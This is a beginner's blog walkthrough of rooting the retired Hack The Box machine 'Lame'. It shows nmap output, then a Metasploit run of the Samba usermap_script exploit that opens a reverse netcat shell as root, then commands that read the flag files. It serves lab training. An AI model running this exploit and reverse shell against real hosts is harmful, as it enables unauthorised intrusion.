No, not “a lame walkthrough” but “the walkthrough of the box called Lame.” That came off wrong. Anyhow ….
There are several HTB Lame walkthroughs out there — I am documenting these steps so that I can have a reference for future enumerations. Aight, let’s do this.
Lame is a super beginner friendly box, in fact this is my first walkthrough and the first box I ever rooted on HTB.
Time required: 15 minutes if you know what you’re doing, 1 hour if you are going to fumble your way through all this like I did.
You will also need a HTB VIP subscription for this is a retired box, and an attackbox that has nmap and metasploit installed. I am using Kali myself.
Let’s do this.
We shall start off with a basic nmap sweep, output below.
I break it down:
– Pn: Treat all hosts as online — skip host discovery (recommended by HTB)
– A: aggressive. Presently this enables OS detection (-O), version scanning (-sV), script scanning (-sC) and traceroute (–traceroute).
kali@kali:~$ nmap 10.10.10.3 -Pn -A Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-26 22:56 EST Nmap scan report for 10.10.10.3 Host is up (0.22s latency). Not shown: 996 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to 10.10.14.25 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | vsFTPd 2.3.4 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 2h39m03s, deviation: 3h32m12s, median: 9m00s | smb-os-discovery: | OS: Unix (Samba 3.0.20-Debian) | Computer name: lame | NetBIOS computer name: | Domain name: hackthebox.gr | FQDN: lame.hackthebox.gr |_ System time: 2021-01-26T23:05:52-05:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smb2-time: Protocol negotiation failed (SMB2) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 70.79 seconds
Two things you need to take away from this output:
– Anonymous FTP login allowed
– The Samba version is Samba smbd 3.0.20-Debian
A little detour: I ftp’d into the box as anonymous user. I poked around but I didn’t find anything so eventually I switched up my strategy. At this point I was getting quite frustrated so I did some googling and stumbled upon a hint eventually. Fast forward 30 minutes…
I googled “Samba 3.0.20 Debian” and lo and behold, the first hit is our friends over at Rapid7 describing an exploit. Would you look at that. So I fire up metasploit, and searched for “samba”. Well, who would’ve thought there was an exploit:
sf5 exploit(linux/snmp/awind_snmp_exec) > search samba/usermap_script Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution msf5 exploit(linux/snmp/awind_snmp_exec) > use 0 [*] Using configured payload cmd/unix/reverse_netcat msf5 exploit(multi/samba/usermap_script) > show options Module options (exploit/multi/samba/usermap_script): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 10.10.10.3 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 139 yes The target port (TCP) Payload options (cmd/unix/reverse_netcat): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 10.10.14.25 yes The listen address (an interface may be specified) LPORT 4443 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf5 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3 RHOSTS => 10.10.10.3 msf5 exploit(multi/samba/usermap_script) > exploit [*] Started reverse TCP handler on 10.10.14.25:4443 [*] Command shell session 6 opened (10.10.14.25:4443 -> 10.10.10.3:45786) at 2021-01-27 00:05:46 -0500
Tah-dah! We have a shell. The rest was a walk in the park:
msf5 exploit(multi/samba/usermap_script) > exploit [*] Started reverse TCP handler on 10.10.14.25:4443 [*] Command shell session 7 opened (10.10.14.25:4443 -> 10.10.10.3:45787) at 2021-01-27 00:06:51 -0500 whoami root find / -name user.txt /home/makis/user.txt cat /home/makis/user.txt <the user flag> find / -name root.txt /root/root.txt cat /root/root.txt <the root flag>
And that’s how you root Lame on HackTheBox.